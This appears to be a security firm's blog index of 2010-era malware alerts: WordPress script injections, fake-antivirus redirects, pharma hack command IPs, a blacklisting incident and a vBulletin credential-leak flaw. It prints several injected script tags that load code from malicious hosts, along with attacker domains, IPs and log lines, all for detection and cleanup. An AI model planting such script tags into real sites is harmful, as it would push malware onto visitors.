We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the domains being used:
http://aeaaea.com/ou
http://secree.com/re
http://uoauer.com/si
http://oeooea.com/ve
http://secowo.com/wo
Those were used in the first batch of attacks that happened a few weeks (months) ago:
http://ae.awaue.com
http://ie.eracou.com
http://ao.euuaw.com
Details about the malware:
http://sucuri.net/malware/entry/MW:RKS:3
For hosting providers/security companies: Block the IP address 91.188.59.203 – (it is hosting all those sites).
Read more.
Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:
< script src = "http://sippa.dottasink.net/music/indi.php”></script>
This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.
And guess who registered that domain?
Read more.
Posted in hacked, malware
|
Tagged hacked, malware
|
We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com.
And when this site went down, guess what is showing up on Google:
Read more.
Update: Gmail not blacklisted anymore.
It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor:
< OK: Host www.gmail.com clean.
—
> WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21
> WARN: Host www.gmail.com blacklisted.
Digging further:
$ host gmail.com
gmail.com has address 74.125.227.24
gmail.com has address 74.125.227.21
gmail.com has address 74.125.227.22
gmail.com has address 74.125.227.23
Read more.
A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:
Understanding and cleaning the pharma hack on WordPress
One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).
If your site has been affected you can double check your access.log for these entries:
94.76.241.4 – - [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 374 “-” “-”
94.76.241.4 – - [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 447 “-” “-”
94.76.241.4 – - [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 444 “-” “-”
94.76.241.4 – - [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1″ 200 202 “-” “-”
This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.
$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550
Read more.
If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc.
The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous “fake AV” virus to the end user of a site. That’s how it looks like in a site:
< script src =" http://vancouvererrorsonfile.com/js2.php
Or in our scanner (blueh2):
Read more.
Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case the SPAM is displayed to all users, not only search engines.
This is how an affected site looks like on our scanner:
Read more.
Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google:
Warning: Visiting this site may harm your computer!
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
They are getting indirectly blacklisted because they are loading content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for having malware.
As far as clearspring is concerned, it seems they’ve been hacked and the attacker has added malicious code to load malware from semaniseme.com and wenmo.in. So multiple levels of indirection here to affect UFC.com users.
Anyone else using clearspring should remove their code from their sites until they have this blacklist issue sorted out.
To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.
If you are running Vbulletin 3.8.6 (the latest 3.8.x version), make sure to remove the faq.php as soon as possible. A vulnerability has been found that allows anyone to retrieve the database credentials from there.
The VBSEO team was quick to react and sent the following note to their clients a little while ago:
Hello valued vBSEO customer,
It has come to our attention that a vulnerability on vBulletin 3.8.6
has been discovered. The exploit allows a malicious user to retrieve a
forum’s database credentials via the faq.php script.
If you are running vBulletin 3.8.6, we strongly recommend that you
remove the faq.php script and change your mysql database details as a
precaution.
You can find faq.php in your vBulletin installation directory:
*/vbroot/faq.php
Update: Patch available here.
It seems that a patch is coming very soon too. Some discussion about this issue here. Thanks to Marcus Maciel for the heads up.
Update 1: It seems that this attack is limited to only Bluehost and Dreamhost, not GoDaddy like in the previous times.
Update 2: This script should fix/clean an infected site: site fix.php
Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com as well.
We’re tracking another series of attacks affecting many web sites (WordPress seems to be the target application so far). This time they’re using whereisdudescars.com as the attacking site and adding the following javascript to the web sites:
<script src=" http://whereisdudescars.com/js2.php"></script>
<script src=" http://nowisisdudescars.com/js.php
This code then loads another javascript from http://www4.realprotection36.co.cc attempting to push the “Fake Anti virus” virus to the visitor of the site.
Read more.
Posted in hacked, malware
|
Tagged hacked, malware
|
